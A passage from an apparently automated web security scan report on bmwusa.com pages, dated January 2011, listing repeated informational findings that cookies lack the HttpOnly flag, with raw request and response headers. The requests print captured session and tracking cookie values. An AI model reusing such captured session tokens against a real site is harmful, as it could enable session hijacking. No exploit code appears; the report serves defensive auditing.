X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:06:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:26:47 GMT;path=/
Content-Length: 227188


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.301. http://www.bmwusa.com/standard/content/vehicles/2011/7/740isedan/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/740isedan/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/740isedan/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:06:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:26:35 GMT;path=/
Content-Length: 215341


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.302. http://www.bmwusa.com/standard/content/vehicles/2011/7/740isedan/modelhighlights/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/740isedan/modelhighlights/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/740isedan/modelhighlights/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:06:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:26:30 GMT;path=/
Content-Length: 215342


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.303. http://www.bmwusa.com/standard/content/vehicles/2011/7/740lisedan/7seriessedanmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/740lisedan/7seriessedanmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/740lisedan/7seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:10:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:30:29 GMT;path=/
Content-Length: 202193


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.304. http://www.bmwusa.com/standard/content/vehicles/2011/7/740lisedan/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/740lisedan/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/740lisedan/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:11:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:31:18 GMT;path=/
Content-Length: 212920


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.305. http://www.bmwusa.com/standard/content/vehicles/2011/7/740lisedan/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/740lisedan/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/740lisedan/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:09:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:29:48 GMT;path=/
Content-Length: 212921


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.306. http://www.bmwusa.com/standard/content/vehicles/2011/7/740lisedan/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/740lisedan/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/740lisedan/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:11:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:31:09 GMT;path=/
Content-Length: 227711


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.307. http://www.bmwusa.com/standard/content/vehicles/2011/7/740lisedan/features_and_specs/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/740lisedan/features_and_specs/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/740lisedan/features_and_specs/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:10:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:30:32 GMT;path=/
Content-Length: 227712


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.308. http://www.bmwusa.com/standard/content/vehicles/2011/7/740lisedan/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/740lisedan/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/740lisedan/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:10:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:30:09 GMT;path=/
Content-Length: 215455


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.309. http://www.bmwusa.com/standard/content/vehicles/2011/7/740lisedan/modelhighlights/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/740lisedan/modelhighlights/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/740lisedan/modelhighlights/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:10:08 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:30:08 GMT;path=/
Content-Length: 215456


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.310. http://www.bmwusa.com/standard/content/vehicles/2011/7/750isedan/7seriessedanmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/750isedan/7seriessedanmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/750isedan/7seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:14:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:34:33 GMT;path=/
Content-Length: 202156


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.311. http://www.bmwusa.com/standard/content/vehicles/2011/7/750isedan/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/750isedan/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/750isedan/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:12:04 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:32:03 GMT;path=/
Content-Length: 212689


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.312. http://www.bmwusa.com/standard/content/vehicles/2011/7/750isedan/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/750isedan/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/750isedan/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:14:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:34:37 GMT;path=/
Content-Length: 228030


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.313. http://www.bmwusa.com/standard/content/vehicles/2011/7/750isedan/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/750isedan/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/750isedan/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:14:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:34:30 GMT;path=/
Content-Length: 215521


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.314. http://www.bmwusa.com/standard/content/vehicles/2011/7/750ixdrivesedan/7seriessedanmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/750ixdrivesedan/7seriessedanmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/750ixdrivesedan/7seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
